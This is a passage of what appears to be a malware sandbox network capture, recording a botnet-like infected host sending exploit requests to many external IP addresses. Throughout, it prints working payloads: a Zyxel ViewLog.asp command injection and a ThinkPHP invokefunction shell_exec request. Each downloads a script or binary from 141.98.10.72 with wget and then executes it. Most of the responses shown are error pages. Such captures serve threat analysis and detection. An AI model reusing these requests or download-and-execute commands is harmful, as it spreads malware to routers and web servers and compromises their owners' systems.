                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.964387894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.947995901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:32.451190948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.409358025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.1454602112.182.85.5880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.321865082 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:51.607316971 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:34:51 GMT
                                                        Server: lighttpd/1.4.33
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.1447378112.65.72.13580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.354938030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.145853894.112.8.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.431096077 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.144232085.238.105.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.448363066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.688060999 CET411INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 10:34:50 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.145974831.44.138.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.463265896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.145306688.198.121.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.525072098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:51.728157043 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.143917288.221.231.3780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.537832022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:51.753828049 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:34:51 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:51 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 31 26 23 34 36 3b 64 36 36 36 66 30 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a79b1702&#46;1707899691&#46;d666f08</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.145308088.198.121.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.929873943 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.1441592112.213.32.2180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.076373100 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.385207891 CET450INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.1440252112.74.96.10880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.123461008 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.470030069 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.1459460112.162.110.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.351609945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.144588231.136.102.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.368956089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.380443096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.524219990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:15.555782080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:40.642774105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.144062885.164.80.958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.370800972 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.622745037 CET300INHTTP/1.0 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.143660685.111.31.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.392556906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.636996031 CET138INHTTP/1.1 400
                                                        Content-Type: text/plain;charset=UTF-8
                                                        Connection: close
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74 0d 0a 54 68 69 73 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 68 6f 73 74 20 61 6e 64 20 70 6f 72 74 20 72 65 71 75 69 72 65 73 20 54 4c 53 2e 0d 0a
                                                        Data Ascii: Bad RequestThis combination of host and port requires TLS.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.144052094.123.107.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.394603968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
